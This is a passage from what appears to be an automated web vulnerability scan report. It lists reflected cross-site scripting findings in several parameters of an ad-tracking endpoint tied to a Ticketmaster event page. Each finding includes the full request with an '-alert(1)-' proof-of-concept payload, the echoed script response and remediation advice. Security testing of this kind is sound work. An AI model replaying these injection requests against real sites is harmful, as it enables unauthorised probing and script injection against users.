GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York40ff5'-alert(1)-'ce08c7702c7&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York40ff5'-alert(1)-'ce08c7702c7';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var
...[SNIP]...

4.66. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_eventid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a82c'-alert(1)-'cda4bbfe238 was submitted in the _RM_HTML_eventid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D437a82c'-alert(1)-'cda4bbfe238&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D437a82c'-alert(1)-'cda4bbfe238';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new
...[SNIP]...

4.67. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_fvalue_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52e9'-alert(1)-'5f1da305d60 was submitted in the _RM_HTML_fvalue_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=e52e9'-alert(1)-'5f1da305d60&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
1';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='e52e9'-alert(1)-'5f1da305d60';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
...[SNIP]...

4.68. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_majorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9979a'-alert(1)-'e992b3e6fb4 was submitted in the _RM_HTML_majorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=100019979a'-alert(1)-'e992b3e6fb4&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='100019979a'-alert(1)-'e992b3e6fb4';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
va
...[SNIP]...

4.69. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_minorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c73ac'-alert(1)-'0a88c6c62c5 was submitted in the _RM_HTML_minorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1c73ac'-alert(1)-'0a88c6c62c5&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
time='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1c73ac'-alert(1)-'0a88c6c62c5';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
var b3_i = new Image (1,
...[SNIP]...

4.70. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pdate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fad1c'-alert(1)-'a553e8d0dcf was submitted in the _RM_HTML_pdate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=fad1c'-alert(1)-'a553e8d0dcf&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='fad1c'-alert(1)-'a553e8d0dcf';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var min
...[SNIP]...

4.71. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pday_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a206'-alert(1)-'c65f39f1218 was submitted in the _RM_HTML_pday_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=3a206'-alert(1)-'c65f39f1218&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='3a206'-alert(1)-'c65f39f1218';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase
...[SNIP]...

4.72. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_ptime_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba97'-alert(1)-'49efd703601 was submitted in the _RM_HTML_ptime_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

